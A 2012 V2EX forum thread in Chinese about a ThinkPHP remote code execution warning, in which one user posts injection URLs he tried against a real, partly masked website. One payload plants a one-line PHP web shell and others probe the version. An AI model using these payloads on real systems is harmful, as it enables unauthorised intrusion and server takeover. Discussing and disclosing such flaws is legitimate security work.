ThinkPHP framework 任意代码执行漏洞预警

2012-04-09 17:14:49 +08:00
 ihacku
http://zone.wooyun.org/index.php?do=view&id=44
4900 次点击
所在节点    信息安全
3 条回复
mywaiting
2012-04-09 17:21:13 +08:00
乌云多了个水区后,我显然多了个可以去的好地方
ihacku
2012-04-09 18:20:17 +08:00
本来我是刚买完票 随手用AWS测试个站 报PHP code injection
http://taot**.net/events/content/id/${@print(md5(acunetix_wvs_security_test))}
后来才看到乌云上的帖子的
http://taot**.net/events/content/id/${@print(THINK_VERSION)}
版本2.1 漏洞影响到的版本包括2.1、2.2和3.0
不知道具体怎么利用 试着在后面加了一句话
http://taot**.net/events/content/id/${@eval($_POST[cmd])}
都是一闪就过去了
ihacku
2012-04-09 18:22:26 +08:00
唔 代码被转掉了

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/31770

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX